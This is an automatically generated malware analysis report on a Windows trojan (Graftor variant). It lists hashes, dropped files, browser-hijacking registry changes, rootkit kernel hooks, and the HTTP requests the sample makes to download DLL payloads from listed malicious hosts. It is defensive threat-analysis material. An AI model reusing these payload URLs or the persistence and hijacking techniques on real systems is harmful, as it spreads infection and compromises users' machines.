Gen.Variant.Graftor.311431_6d4509907f

by malwarelabrobot on January 4th, 2017 in Malware Descriptions.

Gen:Variant.Graftor.311431 (BitDefender), Trojan.Win32.Generic!BT (VIPRE), Trojan.Click3.23060 (DrWeb), Gen:Variant.Graftor.311431 (B) (Emsisoft), GenericRXAR-PT!395CF8C931BB (McAfee), Trojan.Gen (Symantec), Virus.Win32.Delf (Ikarus), Gen:Variant.Graftor.311431 (FSecure), Win32/DH{JDWBDgOCHA?} (AVG), MSIL:Kryptik-AQ [Trj] (Avast), TROJ_GEN.R03EC0RLK16 (TrendMicro), Gen:Variant.Graftor.311431 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 6d4509907f6984392fadff6d4d29afe6
SHA1: 6abaae0b0c8f9867a914048735956d4ea285071e
SHA256: 57e82a7fe1331c7693f17fc09cb458d460c96cef27ee875e615c5c5676ea91cd
SSDeep: 24576:OKfftVr7dl8XJcu K6lBKdqvuNLU6FwHvByw1j 2pW6:1ftVNl8XJcVhlgoulCHp11j9W
Size: 1040976 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company:
Created at: 2012-09-09 19:22:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2472
6d4509907f6984392fadff64d29afe6.exe:1744

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ioyIAh\6d4509907f6984392fadff64d29afe6.exe (7962 bytes)
C:\Windows\kDLxTQ.dll (11 bytes)

The Trojan deletes the following file(s):

C:\Windows\kDLxTQ.dll (0 bytes)

The process 6d4509907f6984392fadff64d29afe6.exe:1744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Windows\FuYQjy\WPHvFGSUV.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Windows\CLOG.txt (87 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Windows\FuYQjy\NRYLflMJ.dll (264 bytes)
C:\Windows\OMTjoPCF.dll (13 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Windows\FuYQjy\4BFD7.dat (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
C:\Windows\System32\2036c9\CDClient_EX.sys (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ioyIAh\6d4509907f6984392fadff64d29afe6.exe (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Windows\FuYQjy\gbilEk.dll (15753 bytes)
C:\Windows\3.txt (1480 bytes)

The Trojan deletes the following file(s):


Registry activity

The process 6d4509907f6984392fadff64d29afe6.exe:1744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\3Lb1eCjYYLQ]
"ErrorControl" = "1"
"ImagePath" = "\DosDevices\C:\Windows\system32\2036c9\CDClient_EX.sys"
"Start" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90093888_hao_pg"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90093888_hao_pg"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "https://www.baidu.com/s?word={searchTerms}&tn=90093888_hao_pg&ie=utf-8"

[HKLM\System\CurrentControlSet\services\3Lb1eCjYYLQ]
"Devname" = "3Lb1eCjYYLQU"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKLM\System\CurrentControlSet\services\3Lb1eCjYYLQ]
"Type" = "1"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

Dropped PE files

MD5 File path
b5c5dcad3899512020d135600129d665 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\ioyIAh\6d4509907f6984392fadff64d29afe6.exe
89d67caa050c7cdcd0d25617570c5100 c:\Windows\FuYQjy\NRYLflMJ.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\2036c9\If56Km8kP8g.sys" the Trojan controls creation and closing of processes by installing a process notifier.
Using the driver "\DosDevices\C:\Windows\system32\2036c9\If56Km8kP8g.sys" the Trojan controls loading of executable images into memory by installing a load-image notifier.
Using the driver "\DosDevices\C:\Windows\system32\2036c9\If56Km8kP8g.sys" the Trojan controls operations on the system registry by installing a registry notifier.
The Trojan installs the following kernel-mode hooks:

ZwTerminateProcess

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 1253376 1014272 5.54504 3ed3fbe35ed89dfd463fa93ee94a9ae0
.rsrc 1257472 8192 5632 4.73277 28a61ba0fe06d9920c6300a0d89f1182

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.58sky.com/index/getcfg?id=59901 119.97.143.58
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://www.58sky.com/index/getcfg?id=216 119.97.143.58
hxxp://5636.ecoma.ourwebpic.com/
hxxp://wdx.go890.com/d2/x86.dll 87.245.198.83
hxxp://www.go890.com/d2/CDClient.dll 87.245.198.83
hxxp://www.ip138.com/ 87.245.198.83
1212.ip138.com 183.238.101.232


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /index/getcfg?id=216 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200
Server: nginx/1.8.1
Date: Tue, 03 Jan 2017 21:53:03 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip

<<< skipped >>>

GET /d2/x86.dll HTTP/1.1
Host: wdx.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 20:33:58 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 03:51:43 GMT
Content-Length: 19213
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Thu, 29 Dec 2016 03:16:04 GMT
Accept-Ranges: bytes
ETag: "aebe84e38161d21:14727"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 64891
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 21:12:05 GMT
Server: kangle/2.9.6
Last-Modified: Tue, 03 Jan 2017 07:42:38 GMT
Content-Type: application/octet-stream
Content-Length: 891904
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET /index/getcfg?id=59901 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200
Server: nginx/1.4.4
Date: Tue, 03 Jan 2017 21:52:47 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

SearchProtocolHost.exe_2704:


SearchFilterHost.exe_3844:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2472
    6d4509907f6984392fadff64d29afe6.exe:1744

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ioyIAh\6d4509907f6984392fadff64d29afe6.exe (7962 bytes)
    C:\Windows\kDLxTQ.dll (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Windows\FuYQjy\WPHvFGSUV.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Windows\CLOG.txt (87 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Windows\FuYQjy\NRYLflMJ.dll (264 bytes)
    C:\Windows\OMTjoPCF.dll (13 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\FuYQjy\4BFD7.dat (161 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
    C:\Windows\System32\2036c9\CDClient_EX.sys (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\FuYQjy\gbilEk.dll (15753 bytes)
    C:\Windows\3.txt (1480 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
